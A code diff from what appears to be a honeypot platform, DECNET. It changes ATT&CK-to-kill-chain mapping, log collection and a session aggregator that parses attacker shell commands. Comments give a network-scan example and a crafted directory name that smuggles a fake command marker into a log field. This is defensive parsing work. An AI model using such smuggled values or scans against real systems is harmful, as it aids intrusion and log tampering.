@@ -107,96 +106,3 @@ def stage_of(phase: UKCPhase) -> str:
|
||||
if phase in STAGE_THROUGH:
|
||||
return "through"
|
||||
return "out"
|
||||
|
||||
|
||||
# Forward map: MITRE ATT&CK tactic ID -> UKC phase. It lists the 14
# enterprise tactics and the four ICS tactics referenced by Appendix A.7
# (Conpot, MQTT). Supporting another ICS tactic is a one-line addition.
# See TTP_TAGGING.md "UKC bridge".
ATTACK_TACTIC_TO_UKC: dict[str, UKCPhase] = {
    # ── Enterprise ──
    "TA0043": UKCPhase.RECONNAISSANCE,        # Reconnaissance
    "TA0042": UKCPhase.RESOURCE_DEVELOPMENT,  # Resource Development
    "TA0001": UKCPhase.DELIVERY,              # Initial Access
    "TA0002": UKCPhase.EXECUTION,             # Execution
    "TA0003": UKCPhase.PERSISTENCE,           # Persistence
    "TA0004": UKCPhase.PRIVILEGE_ESCALATION,  # Privilege Escalation
    "TA0005": UKCPhase.DEFENSE_EVASION,       # Defense Evasion
    "TA0006": UKCPhase.CREDENTIAL_ACCESS,     # Credential Access
    "TA0007": UKCPhase.DISCOVERY,             # Discovery
    "TA0008": UKCPhase.LATERAL_MOVEMENT,      # Lateral Movement
    "TA0009": UKCPhase.COLLECTION,            # Collection
    "TA0011": UKCPhase.COMMAND_AND_CONTROL,   # Command and Control
    "TA0010": UKCPhase.EXFILTRATION,          # Exfiltration
    "TA0040": UKCPhase.IMPACT,                # Impact
    # ── ICS ──
    # Projected first-class so MQTT / Conpot / Modbus tags are not lost
    # from campaign rollups when the clusterer turns a tactic into a
    # phase. ICS tactic IDs come from their own, separate ID range.
    "TA0100": UKCPhase.COLLECTION,            # ICS: Collection
    "TA0102": UKCPhase.DISCOVERY,             # ICS: Discovery
    "TA0105": UKCPhase.IMPACT,                # ICS: Impact
    "TA0106": UKCPhase.IMPACT,                # ICS: Impair Process Control
}


# The ICS tactics belong to a different STIX bundle (mitre/ics-attack)
# which DECNET does not currently load. They are exempted from the
# enterprise-bundle check in :func:`validate_against_attack_bundle` so
# that the startup validation does not false-fail once ICS rules are
# wired in.
_NON_ENTERPRISE_TACTICS: Final[frozenset[str]] = frozenset(
    ("TA0100", "TA0102", "TA0105", "TA0106")
)
|
||||
|
||||
|
||||
def validate_against_attack_bundle() -> None:
    """Check the tactic IDs of :data:`ATTACK_TACTIC_TO_UKC` against the STIX bundle.

    Hands every key of the forward map to
    ``decnet.ttp.attack_stix.assert_known_tactic_ids``, exempting the IDs
    in :data:`_NON_ENTERPRISE_TACTICS`. Intended to be called at startup
    (see :mod:`decnet.ttp.impl.rule_engine`) so that a typoed tactic ID
    fails the boot instead of silently dropping out of campaign rollups.
    """
    from decnet.ttp.attack_stix import assert_known_tactic_ids

    mapped_tactic_ids = list(ATTACK_TACTIC_TO_UKC)
    ics_exemptions = set(_NON_ENTERPRISE_TACTICS)
    assert_known_tactic_ids(
        mapped_tactic_ids,
        source="decnet.clustering.ukc.ATTACK_TACTIC_TO_UKC",
        exempt=ics_exemptions,
    )
|
||||
|
||||
|
||||
def tactic_to_ukc_phase(tactic: str) -> UKCPhase | None:
    """Translate an ATT&CK tactic ID (e.g. ``"TA0001"``) into a :class:`UKCPhase`.

    Returns ``None`` when *tactic* is not a key of
    :data:`ATTACK_TACTIC_TO_UKC`. That map is meant to be closed over the
    enterprise + ICS tactics the rule pack references, so an unknown
    tactic indicates a contributor bug rather than a runtime miss.
    """
    try:
        return ATTACK_TACTIC_TO_UKC[tactic]
    except KeyError:
        return None
|
||||
|
||||
|
||||
# Inverse of ATTACK_TACTIC_TO_UKC, built once at import time.
#
# Several tactics share a phase (e.g. TA0009 and TA0100 both map to
# COLLECTION). A dict comprehension keeps the LAST value written for a
# key, so the forward map is walked in reverse: the tactic listed FIRST
# in ATTACK_TACTIC_TO_UKC (the enterprise one) is written last and wins.
#
# A phase that no tactic maps to has no entry here, so the inverse is
# undefined for it. See TTP_TAGGING.md §UKC bridge.
# NOTE(review): this comment previously listed RECONNAISSANCE and
# RESOURCE_DEVELOPMENT among the phases that are lossy on the inverse,
# but TA0043 / TA0042 are keys of the forward map, so both DO get an
# entry here — confirm which of the two is intended.
_UKC_TO_TACTIC: dict[UKCPhase, str] = {
    ukc_phase: tactic_id
    for tactic_id, ukc_phase in reversed(list(ATTACK_TACTIC_TO_UKC.items()))
}
|
||||
|
||||
|
||||
def ukc_phase_to_tactic(phase: UKCPhase) -> str | None:
    """Map a :class:`UKCPhase` back to an ATT&CK tactic ID.

    Looks *phase* up in :data:`_UKC_TO_TACTIC` and returns the tactic ID
    string. Returns ``None`` when the phase has no entry there, i.e. when
    no tactic in :data:`ATTACK_TACTIC_TO_UKC` maps to it (for example
    ``WEAPONIZATION``). Where several tactics share a phase, the one
    listed first in the forward map is returned.

    NOTE(review): earlier documentation stated that every phase outside
    :data:`OBSERVABLE_PHASES` (naming ``RECONNAISSANCE``) returns
    ``None``. The lookup applies no such filter: ``RECONNAISSANCE`` and
    ``RESOURCE_DEVELOPMENT`` are values of the forward map and therefore
    resolve to ``"TA0043"`` / ``"TA0042"``. Confirm against the CDD test
    in E.2.9 whether the code or the documented contract should change.
    """
    return _UKC_TO_TACTIC.get(phase)
|
||||
|
||||
@@ -115,11 +115,11 @@ async def run_clusterer_loop(
|
||||
t.cancel()
|
||||
if heartbeat_task is not None:
|
||||
heartbeat_task.cancel()
|
||||
for task in (*wake_tasks, heartbeat_task):
|
||||
if task is None:
|
||||
for t in (*wake_tasks, heartbeat_task):
|
||||
if t is None:
|
||||
continue
|
||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||
await task
|
||||
await t
|
||||
if bus is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
await bus.close()
|
||||
|
||||
@@ -18,7 +18,6 @@ from datetime import datetime
|
||||
from pathlib import Path
|
||||
from typing import Any, Callable, Optional
|
||||
|
||||
from decnet.artifacts.shards import find_shard_with_sid
|
||||
from decnet.bus import topics as _topics
|
||||
from decnet.bus.factory import get_bus
|
||||
from decnet.bus.publish import (
|
||||
@@ -76,21 +75,6 @@ _RL_EVENT_TYPES: frozenset[str] = frozenset(
|
||||
)
|
||||
_RL_MAX_ENTRIES: int = 10_000
|
||||
|
||||
# APP-NAMEs that must never reach the ingestion stream: native unix
# daemons that happen to share a container with a DECNET service. Their
# output is noise — sshd's "Failed password for root from X" duplicates
# the auth-helper's structured `auth_attempt` event, pam_unix repeats it
# once more, and CRON/systemd/etc. say nothing about attacker behavior.
# Set DECNET_COLLECTOR_DROP_APPS (comma-separated) to replace this list.
# Entries are whitespace-stripped and empty ones are discarded.
_DROP_APPS: frozenset[str] = frozenset(
    filter(
        None,
        map(
            str.strip,
            os.environ.get(
                "DECNET_COLLECTOR_DROP_APPS",
                "sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon",
            ).split(","),
        ),
    )
)
|
||||
|
||||
_rl_lock: threading.Lock = threading.Lock()
|
||||
_rl_last: dict[tuple[str, str, str, str], float] = {}
|
||||
|
||||
@@ -98,11 +82,10 @@ _rl_last: dict[tuple[str, str, str, str], float] = {}
|
||||
def _should_ingest(parsed: dict[str, Any]) -> bool:
|
||||
"""
|
||||
Return True if this parsed event should be written to the JSON ingestion
|
||||
stream. Drops native unix daemon noise (sshd, pam_unix, …) outright;
|
||||
rate-limits connection-lifecycle events within a dedup window.
|
||||
stream. Rate-limited connection-lifecycle events return False when another
|
||||
event with the same (attacker_ip, decky, service, event_type) was emitted
|
||||
inside the dedup window.
|
||||
"""
|
||||
if parsed.get("service", "") in _DROP_APPS:
|
||||
return False
|
||||
event_type = parsed.get("event_type", "")
|
||||
if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
|
||||
return True
|
||||
@@ -133,234 +116,6 @@ def _reset_rate_limiter() -> None:
|
||||
with _rl_lock:
|
||||
_rl_last.clear()
|
||||
|
||||
|
||||
# ─── Session aggregator (TTP `attacker.session.ended` producer) ──────────────
#
# The TTP worker subscribes to ``attacker.session.ended`` and converts
# every command in the envelope into a ``source_kind="command"``
# :class:`TaggerEvent` (see ``decnet/ttp/worker._build_events``). Nothing
# upstream used to publish that topic, so the rule pack never fired on
# live traffic. The aggregator below indexes shell-command events per
# attacker_ip and publishes one ``attacker.session.ended`` envelope each
# time the SSH ``sessrec`` worker reports ``session_recorded``.
#
# Memory bound: the per-attacker_ip command list is trimmed by a TTL
# eviction (default 3600 s). Override the TTL through
# ``DECNET_COLLECTOR_SESSION_AGG_TTL_SEC``.

_SESSION_AGG_TTL_SEC: float = _parse_float_env("DECNET_COLLECTOR_SESSION_AGG_TTL_SEC", 3600.0)
|
||||
|
||||
|
||||
# Body of a bash PROMPT_COMMAND CMD line:
#   ``CMD uid=0 user=root src=192.168.1.5 pwd=/root cmd=ls /var/www/html``
# The head is a run of whitespace-free ``key=value`` pairs (the fields
# the inspector renders). Everything after ``cmd=`` is the command and
# may itself contain spaces, so it is kept as one token and never
# word-split.
_CMD_BODY_HEAD_KV_RE = re.compile(r'(\w+)=(\S+)')

# ``cmd=`` only counts as the command marker when it starts a token (at
# the beginning of the body or right after whitespace). Matching the bare
# substring would also split inside another field's value, e.g.
# ``pwd=/tmp/xcmd=y``, letting an attacker-chosen directory name corrupt
# both ``pwd`` and the parsed command.
_CMD_BODY_CMD_MARKER_RE = re.compile(r'(?:^|\s)cmd=')


def _parse_cmd_msg(msg: str) -> dict[str, str]:
    """Split a bash CMD msg body into its ``key=value`` fields plus ``command``.

    Args:
        msg: Raw message body, expected to start with ``"CMD "``.

    Returns:
        An empty dict when *msg* does not start with ``"CMD "``. Otherwise
        a dict of every ``key=value`` pair found before the ``cmd=``
        marker (typically ``uid``, ``user``, ``src``, ``pwd``) and, when
        the marker is present, ``command`` holding the complete text after
        it — embedded whitespace included, so ``nmap -p- 192.168.1.0/24``
        is not truncated at the first space.
    """
    if not msg.startswith("CMD "):
        return {}
    body = msg[4:]
    marker = _CMD_BODY_CMD_MARKER_RE.search(body)
    if marker is None:
        # No command marker: the whole body is head fields.
        return dict(_CMD_BODY_HEAD_KV_RE.findall(body))
    out: dict[str, str] = dict(_CMD_BODY_HEAD_KV_RE.findall(body[:marker.start()]))
    out["command"] = body[marker.end():]
    return out
|
||||
|
||||
|
||||
def _parse_iso_ts(value: str) -> Optional[datetime]:
    """Parse an event timestamp string, returning ``None`` when it is unusable.

    Two spellings are attempted through ``datetime.fromisoformat``: the
    value as given, and the value with every space replaced by ``T``.
    This covers both shapes the collector's parser stamps into
    ``timestamp`` — the original ISO-8601 string and the reformatted
    ``%Y-%m-%d %H:%M:%S`` string. An empty value, or one that parses in
    neither spelling, yields ``None`` so the aggregator can skip events
    it cannot place in time.
    """
    result: Optional[datetime] = None
    if value:
        for spelling in (value, value.replace(" ", "T")):
            try:
                result = datetime.fromisoformat(spelling)
            except ValueError:
                continue
            break
    return result
|
||||
|
||||
|
||||
class _SessionAggregator:
    """Per-attacker_ip command index that emits ``attacker.session.ended``.

    ``command`` events are remembered per attacker IP; a
    ``session_recorded`` event triggers one published envelope that
    carries the remembered commands falling inside the session window.

    All state is guarded by a single lock, and :meth:`add_event` is
    intended to be called from the per-container stream threads. The
    publish call is made while the lock is held, for simplicity; this
    relies on ``publish_fn`` being the thread-safe, non-blocking
    marshaller from :mod:`decnet.bus.publish`.
    """

    def __init__(
        self,
        publish_fn: Callable[[str, dict[str, Any], str], None],
        *,
        ttl_sec: float = _SESSION_AGG_TTL_SEC,
    ) -> None:
        """Store the publisher and the command TTL; start with an empty index."""
        self._publish = publish_fn
        self._ttl = ttl_sec
        self._lock = threading.Lock()
        # attacker_ip -> [(timestamp, parsed_event), ...]. A plain list
        # (not a deque) because the window filter scans it linearly; the
        # TTL and typical session sizes (at most a few hundred commands)
        # keep that scan cheap.
        self._cmds: dict[str, list[tuple[datetime, dict[str, Any]]]] = {}

    def add_event(self, parsed: dict[str, Any]) -> None:
        """Index a parsed event; publish a session on ``session_recorded``.

        Events with no attacker IP (or the literal ``"Unknown"``), or
        with a timestamp that cannot be parsed, are ignored. Expired
        commands are evicted on every accepted event, using the event's
        own timestamp as "now".
        """
        event_type = parsed.get("event_type", "")
        attacker_ip = parsed.get("attacker_ip") or ""
        if attacker_ip in ("", "Unknown"):
            return
        ts = _parse_iso_ts(str(parsed.get("timestamp", "")))
        if ts is None:
            return
        with self._lock:
            self._evict_expired(ts)
            if event_type == "command":
                self._cmds.setdefault(attacker_ip, []).append((ts, parsed))
            elif event_type == "session_recorded":
                self._emit_session(parsed, attacker_ip, ts)

    def _evict_expired(self, now: datetime) -> None:
        """Forget commands older than ``self._ttl`` seconds relative to *now*."""
        oldest_allowed = now.timestamp() - self._ttl
        for ip in list(self._cmds):
            fresh = [
                item for item in self._cmds[ip]
                if item[0].timestamp() >= oldest_allowed
            ]
            if fresh:
                self._cmds[ip] = fresh
            else:
                # Drop the key entirely so idle attackers do not pile up.
                del self._cmds[ip]

    def _emit_session(
        self, parsed: dict[str, Any], attacker_ip: str, ended_at: datetime,
    ) -> None:
        """Build an ``attacker.session.ended`` envelope and publish it.

        Selects the commands stored for *attacker_ip* whose timestamp is
        not earlier than ``ended_at - duration_s``; no upper bound is
        applied. Selected commands are NOT removed from the index — TTL
        eviction is the only thing that drops them — so two back-to-back
        sessions from the same IP can both see the same commands.
        """
        fields = parsed.get("fields", {}) or {}
        raw_duration = fields.get("duration_s") or "0"
        try:
            duration_s = float(raw_duration)
        except (TypeError, ValueError):
            duration_s = 0.0
        sid = str(fields.get("sid") or "")
        service = str(fields.get("service") or parsed.get("service") or "")
        decky = parsed.get("decky") or ""

        # A negative duration is treated as zero.
        window_start = ended_at.timestamp() - max(duration_s, 0.0)
        commands: list[dict[str, Any]] = []
        for idx, (cmd_ts, cmd_parsed) in enumerate(self._cmds.get(attacker_ip, [])):
            if cmd_ts.timestamp() < window_start:
                continue
            cmd_fields = cmd_parsed.get("fields", {}) or {}
            # Recover structured uid/user/src/pwd/command from the bash
            # msg body so the inspector can show them as separate
            # key/value rows rather than one raw
            # ``CMD uid=0 user=... cmd=...`` blob in ``command_text``.
            parsed_kv = _parse_cmd_msg(str(cmd_parsed.get("msg", "")))
            cmd_text = (
                cmd_fields.get("command")
                or cmd_fields.get("cmd")
                or parsed_kv.get("command")
                or cmd_parsed.get("msg", "")
            )
            if sid:
                # idx is the position in the stored list, not in the
                # filtered window.
                entry_id = f"{sid}#{idx}"
            else:
                entry_id = f"{attacker_ip}-{cmd_ts.isoformat()}"
            entry: dict[str, Any] = {
                "id": entry_id,
                "command_text": str(cmd_text),
                "ts": cmd_ts.isoformat(),
                "decky": cmd_parsed.get("decky", ""),
                "service": cmd_parsed.get("service", ""),
            }
            for key in ("uid", "user", "src", "pwd"):
                value = parsed_kv.get(key) or cmd_fields.get(key)
                if value is not None:
                    entry[key] = value
            commands.append(entry)

        # Resolve the asciinema shard once here so consumers (notably the
        # BEHAVE-SHELL session-ended handler in the profiler worker) need
        # not each reach for the disk. The shard fields can be malformed
        # or the transcripts dir may not exist yet; in either case the
        # envelope carries ``shard_path: None`` and the consumer skips.
        # The field is additive — existing TTP consumers ignore it.
        shard_path: str | None = None
        resolve_error: str | None = None
        if sid and decky and service:
            try:
                resolved = find_shard_with_sid(decky, service, sid)
            except (ValueError, OSError, PermissionError) as exc:
                resolve_error = f"{type(exc).__name__}: {exc}"
                resolved = None
            if resolved is not None:
                shard_path = str(resolved)
        if shard_path is None and sid:
            # Loud by default: the BEHAVE-SHELL handler skips envelopes
            # with shard_path=None, so a silent miss would leave the
            # profiler panel empty. Usual causes, so the operator does not
            # have to read decnet/artifacts/shards.py:
            #
            #   1. ARTIFACTS_ROOT is not readable by the collector's user
            #      (perm 0750 decnet:decnet vs. User=anti without
            #      SupplementaryGroups=decnet).
            #   2. Service whitelist (_SERVICE_RE accepts ssh|telnet only).
            #   3. sessrec has not flushed the shard for this sid yet
            #      (collector tick won the race; next tick recovers).
            logger.warning(
                "collector: shard_path=None decky=%s service=%s sid=%s "
                "(error=%s) — profiler will skip this session.ended; "
                "check ARTIFACTS_ROOT perms / service whitelist",
                decky, service, sid, resolve_error or "shard not found",
            )

        payload: dict[str, Any] = {
            "session_id": sid or None,
            "attacker_uuid": None,  # consumer resolves via repo
            "attacker_ip": attacker_ip,
            "decky_id": decky,
            "service": service,
            "ended_at": ended_at.isoformat(),
            "duration_s": duration_s,
            "commands": commands,
            "shard_path": shard_path,
        }
        topic = _topics.attacker(_topics.ATTACKER_SESSION_ENDED)
        try:
            self._publish(topic, payload, _topics.ATTACKER_SESSION_ENDED)
        except Exception as exc:  # noqa: BLE001
            # A failed publish must not break the calling stream thread.
            logger.debug(
                "collector: session.ended publish failed: %s", exc,
            )
|
||||
|
||||
# ─── RFC 5424 parser ──────────────────────────────────────────────────────────
|
||||
|
||||
_RFC5424_RE = re.compile(
|
||||
@@ -374,27 +129,6 @@ _RFC5424_RE = re.compile(
|
||||
r"(\S+) " # 4: MSGID (event_type)
|
||||
r"(.+)$", # 5: SD element + optional MSG
|
||||
)
|
||||
|
||||
# Honeypot SSH containers export a ``PROMPT_COMMAND`` that calls
|
||||
# ``logger --rfc5424 --msgid command -p user.info -t bash "CMD …"``.
|
||||
# That inner RFC 5424 line lands on the container's stdout, where the
|
||||
# Docker stream reader prepends ANOTHER RFC 5424 envelope (PRI=14,
|
||||
# HOSTNAME=<decky>, APP-NAME=1, MSGID=NIL). The outer parse therefore
|
||||
# sees ``event_type == "-"`` while the real MSGID (``command``) is
|
||||
# inside the body. We detect that case and re-extract the inner
|
||||
# ``HOSTNAME APP-NAME PROCID MSGID rest`` so downstream consumers see
|
||||
# ``event_type == "command"`` plus the real source hostname.
|
||||
#
|
||||
# Anchored on an ISO-8601 timestamp at the head of the body so we
|
||||
# don't false-match free-form prose like "Connection from 1.2.3.4".
|
||||
_INNER_RFC5424_RE = re.compile(
|
||||
r"^(\d{4}-\d{2}-\d{2}T\S+)\s+" # 1: inner TIMESTAMP
|
||||
r"(\S+)\s+" # 2: inner HOSTNAME
|
||||
r"(\S+)\s+" # 3: inner APP-NAME
|
||||
r"\S+\s+" # PROCID (NIL or PID)
|
||||
r"(\S+)\s+" # 4: inner MSGID
|
||||
r"(.+)$", # 5: inner SD/MSG remainder
|
||||
)
|
||||
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
|
||||
_PARAM_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')
|
||||
_IP_FIELDS = ("src_ip", "src", "client_ip", "remote_ip", "remote_addr", "target_ip", "ip")
|
||||
@@ -434,23 +168,8 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
|
||||
ts_raw, decky, service, event_type, sd_rest = m.groups()
|
||||
|
||||
fields: dict[str, str] = {}
|
||||
|
||||
# Honeypot SSH PROMPT_COMMAND lines are double-wrapped (Docker
|
||||
# stdout envelope around the inner ``logger --msgid command`` line).
|
||||
# Outer MSGID is NIL; the real MSGID is inside the body. Detect
|
||||
# the inner shape and re-extract HOSTNAME / APP-NAME / MSGID /
|
||||
# remainder so downstream extraction sees the real header.
|
||||
if event_type == "-" and sd_rest.startswith("-"):
|
||||
body = sd_rest[1:].lstrip()
|
||||
inner = _INNER_RFC5424_RE.match(body)
|
||||
if inner is not None:
|
||||
_i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
|
||||
decky = i_host
|
||||
service = i_app
|
||||
event_type = i_msgid
|
||||
sd_rest = i_rest
|
||||
|
||||
msg: str = ""
|
||||
|
||||
if sd_rest.startswith("-"):
|
||||
msg = sd_rest[1:].lstrip()
|
||||
elif sd_rest.startswith("["):
|
||||
@@ -458,28 +177,16 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
|
||||
if block:
|
||||
for k, v in _PARAM_RE.findall(block.group(1)):
|
||||
fields[k] = v.replace('\\"', '"').replace("\\\\", "\\").replace("\\]", "]")
|
||||
# Always recover the post-SD message tail, even when the SD
|
||||
# block isn't ``relay@55555`` (e.g. the ``timeQuality`` block
|
||||
# syslog auto-emits on bash CMD lines). Without this the body
|
||||
# of unwrapped PROMPT_COMMAND lines stays empty and the
|
||||
# attacker_ip kv-fallback below has nothing to scan.
|
||||
msg_match = re.search(r'\]\s+(.+)$', sd_rest)
|
||||
if msg_match:
|
||||
msg = msg_match.group(1).strip()
|
||||
msg_match = re.search(r'\]\s+(.+)$', sd_rest)
|
||||
if msg_match:
|
||||
msg = msg_match.group(1).strip()
|
||||
else:
|
||||
msg = sd_rest
|
||||
|
||||
attacker_ip = "Unknown"
|
||||
for fname in _IP_FIELDS:
|
||||
if fname in fields:
|
||||
raw = fields[fname]
|
||||
# remote_addr may be "host:port" — split so identity keys on IP only.
|
||||
host, _, port = raw.rpartition(":")
|
||||
if host and port.isdigit():
|
||||
attacker_ip = host.strip("[]") # handle [::1]:port IPv6 form
|
||||
fields.setdefault("remote_port", port)
|
||||
else:
|
||||
attacker_ip = raw
|
||||
attacker_ip = fields[fname]
|
||||
break
|
||||
|
||||
# Fallback for plain `logger` callers that don't use SD params (notably
|
||||
@@ -513,12 +220,6 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
|
||||
except ValueError:
|
||||
ts_formatted = ts_raw
|
||||
|
||||
# Free-form bash PROMPT_COMMAND lines (MSGID=NIL, body starts with
|
||||
# "CMD ") get event_type rewritten to "command". `fields` stays empty
|
||||
# so the frontend's msg-based pill rendering doesn't double up.
|
||||
if event_type == "-" and msg.startswith("CMD "):
|
||||
event_type = "command"
|
||||
|
||||
return {
|
||||
"timestamp": ts_formatted,
|
||||
"decky": decky,
|
||||
@@ -645,7 +346,7 @@ def _stream_container(
|
||||
publish_fn: CollectorPublishFn | None = None,
|
||||
) -> None:
|
||||
"""Stream logs from one container and append to the host log files."""
|
||||
import docker
|
||||
import docker # type: ignore[import]
|
||||
|
||||
lf: Optional[Any] = None
|
||||
jf: Optional[Any] = None
|
||||
@@ -715,17 +416,12 @@ def _make_system_log_publisher(
|
||||
thread can call it unconditionally. Otherwise each call is marshalled
|
||||
onto *loop* (the asyncio event loop that owns the bus socket) via
|
||||
``make_thread_safe_publisher``.
|
||||
|
||||
The same call also feeds a :class:`_SessionAggregator` so shell
|
||||
commands are indexed per-attacker_ip and ``attacker.session.ended``
|
||||
fires whenever the SSH ``sessrec`` worker logs ``session_recorded``.
|
||||
"""
|
||||
raw_publish = make_thread_safe_publisher(bus, loop) if bus is not None else None
|
||||
if raw_publish is None:
|
||||
return lambda _parsed: None
|
||||
|
||||
topic = _topics.system(_topics.SYSTEM_LOG)
|
||||
aggregator = _SessionAggregator(raw_publish)
|
||||
|
||||
def _publish(parsed: dict[str, Any]) -> None:
|
||||
event_type = parsed.get("event_type", "")
|
||||
@@ -740,7 +436,6 @@ def _make_system_log_publisher(
|
||||
},
|
||||
event_type,
|
||||
)
|
||||
aggregator.add_event(parsed)
|
||||
|
||||
return _publish
|
||||
|
||||
@@ -755,7 +450,7 @@ async def log_collector_worker(log_file: str) -> None:
|
||||
|
||||
Watches Docker events to pick up containers started after initial scan.
|
||||
"""
|
||||
import docker
|
||||
import docker # type: ignore[import]
|
||||
|
||||
log_path = Path(log_file)
|
||||
json_path = log_path.with_suffix(".json")
|
||||
|
||||
@@ -39,7 +39,6 @@ Shape::
|
||||
master-host = 10.0.0.1 # required on agents
|
||||
syslog-port = 6514
|
||||
swarmctl-port = 8770
|
||||
swarmctl-host = 127.0.0.1 # bind address for `decnet swarmctl`
|
||||
|
||||
[logging]
|
||||
system-log = /var/log/decnet/decnet.system.log
|
||||
@@ -121,7 +120,6 @@ _DOMAIN_MAP: dict[str, dict[str, str]] = {
|
||||
"master-host": "DECNET_SWARM_MASTER_HOST",
|
||||
"syslog-port": "DECNET_SWARM_SYSLOG_PORT",
|
||||
"swarmctl-port": "DECNET_SWARMCTL_PORT",
|
||||
"swarmctl-host": "DECNET_SWARMCTL_HOST",
|
||||
},
|
||||
"logging": {
|
||||
"system-log": "DECNET_SYSTEM_LOGS",
|
||||
|
||||
@@ -1,21 +0,0 @@
|
||||
"""DECNET attribution engine — v0 aggregation library.
|
||||
|
||||
Pure library: per-(identity, primitive) state machine over BEHAVE-SHELL
|
||||
observations. No I/O, no bus, no DB. The bus subscriber and DB writes
|
||||
live in :mod:`decnet.correlation.attribution_worker` so this package
|
||||
stays trivially testable with synthetic observation lists.
|
||||
|
||||
See ``development/ATTRIBUTION-ENGINE.md`` for the full design and the
|
||||
explicit bright line: this engine does NOT do persona classification
|
||||
(HUMAN/LLM/SCRIPTED), does NOT gate access, does NOT attribute to
|
||||
named persons. It surfaces *behavioural coherence* and *behavioural
|
||||
drift*, and stops there.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.correlation.attribution.aggregate import (
|
||||
AttributionState,
|
||||
aggregate_observations,
|
||||
)
|
||||
|
||||
__all__ = ["AttributionState", "aggregate_observations"]
|
||||
@@ -1,62 +0,0 @@
|
||||
"""Calibration thresholds for the attribution engine — every magic
|
||||
number lives here, named, with the calibration source cited.
|
||||
|
||||
v0 values are heuristic. Real calibration ships when red-team
|
||||
exercises produce labelled trace data
|
||||
(``ATTRIBUTION-ENGINE.md`` §"Out of scope"). Until then these constants
|
||||
are the engine's only knobs; aggregate.py never embeds a literal.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
# ── Categorical merger ────────────────────────────────────────────────
|
||||
# Last-N window size for the categorical state machine. 5 calibrates
|
||||
# against typical session counts (most attackers are observed < 10
|
||||
# times before they go quiet — ATTRIBUTION-ENGINE.md §"Open question
|
||||
# 2"). Operators with long-running attackers will want a wider window
|
||||
# in v1.
|
||||
CATEGORICAL_WINDOW_N = 5
|
||||
|
||||
# Minimum observations before the merger emits anything other than
|
||||
# ``unknown``. Below this floor the state machine has no signal.
|
||||
MIN_OBSERVATIONS_FOR_STATE = 3
|
||||
|
||||
# Categorical merger is one-outlier-tolerant: in a window of N=5, the
|
||||
# state is ``stable`` if at least ``MAJORITY_THRESHOLD`` agree.
|
||||
CATEGORICAL_MAJORITY_THRESHOLD = 4
|
||||
|
||||
# ── Numeric merger ────────────────────────────────────────────────────
|
||||
# EWMA smoothing factor for numeric primitives. 0.3 weights recent
|
||||
# observations enough to surface drift quickly without flapping on
|
||||
# single outliers.
|
||||
NUMERIC_EWMA_ALPHA = 0.3
|
||||
|
||||
# Coefficient-of-variation thresholds: dispersion / |mean|.
|
||||
NUMERIC_STABLE_DISPERSION_PCT = 0.20 # < 20% of mean → stable
|
||||
NUMERIC_DRIFT_MEAN_SHIFT_PCT = 0.30 # mean moved > 30% → drifting
|
||||
NUMERIC_CONFLICT_DISPERSION_PCT = 1.0 # > 100% of mean → conflicted
|
||||
|
||||
# ── Hash merger ───────────────────────────────────────────────────────
|
||||
# Rotations within HASH_DRIFT_WINDOW count toward state transitions.
|
||||
# 1..HASH_DRIFT_MAX rotations → drifting; more → conflicted. The values mirror the
|
||||
# DEBT-032 fingerprint-rotation calibration — bumped by one because
|
||||
# the attribution engine takes one rotation as evidence-of-life, not
|
||||
# yet evidence-of-drift.
|
||||
HASH_DRIFT_MAX = 2
|
||||
HASH_DRIFT_WINDOW_SECS = 24 * 60 * 60 # 24h
|
||||
|
||||
# ── Multi-actor cap ───────────────────────────────────────────────────
|
||||
# multi_actor confidence is capped to keep the dashboard honest about
|
||||
# how noisy this signal is. ATTRIBUTION-ENGINE.md §"Open question 1":
|
||||
# flapping primitives on flaky networks look like two operators.
|
||||
MULTI_ACTOR_MAX_CONFIDENCE = 0.6
|
||||
|
||||
# ── Cross-primitive correlator (Phase 5) ──────────────────────────────
|
||||
# Minimum number of primitives that must independently flag
|
||||
# ``multi_actor`` for the same identity before
|
||||
# ``attribution.profile.multi_actor_suspected`` fires.
|
||||
MULTI_ACTOR_MIN_PRIMITIVES = 2
|
||||
|
||||
# Tick interval for the periodic walk in
|
||||
# :mod:`decnet.correlation.attribution_worker`. Configurable via env
|
||||
# var in v1; hardcoded in v0.
|
||||
MULTI_ACTOR_TICK_SECS = 60.0
|
||||
@@ -1,418 +0,0 @@
|
||||
"""Per-(identity, primitive) state-machine — the attribution engine's
|
||||
core merge logic.
|
||||
|
||||
Pure: given a list of BEHAVE observations for one
|
||||
``(identity_uuid, primitive)`` pair (already ordered by ``ts`` ASC),
|
||||
returns the derived state. No DB, no bus, no I/O. The worker
|
||||
(``decnet.correlation.attribution_worker``) is responsible for loading
|
||||
the observations and writing the state row.
|
||||
|
||||
State vocabulary is frozen at five values (see
|
||||
``ATTRIBUTION-ENGINE.md``):
|
||||
|
||||
* ``unknown`` — < ``MIN_OBSERVATIONS_FOR_STATE`` observations
|
||||
* ``stable`` — recent N agree
|
||||
* ``drifting`` — recent N stable but disagree with older N
|
||||
* ``conflicted`` — recent N split
|
||||
* ``multi_actor`` — conflicted + cross-session alternation pattern
|
||||
|
||||
Phase 2 ships :func:`aggregate_categorical` (the dominant ValueKind
|
||||
for BEHAVE-SHELL primitives). Phase 3 adds numeric + hash mergers and
|
||||
the ValueKind dispatcher in :func:`aggregate_observations`.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from collections import Counter
|
||||
from dataclasses import dataclass
|
||||
from typing import Any, Sequence
|
||||
|
||||
from decnet.correlation.attribution import _thresholds as _T
|
||||
|
||||
__all__ = [
|
||||
"AttributionState",
|
||||
"aggregate_observations",
|
||||
"aggregate_categorical",
|
||||
"aggregate_numeric",
|
||||
"aggregate_hash",
|
||||
]
|
||||
|
||||
|
||||
@dataclass(frozen=True)
class AttributionState:
    """Output of the merger for one ``(identity, primitive)`` pair.

    The fields map onto :class:`AttributionStateRow` columns; the
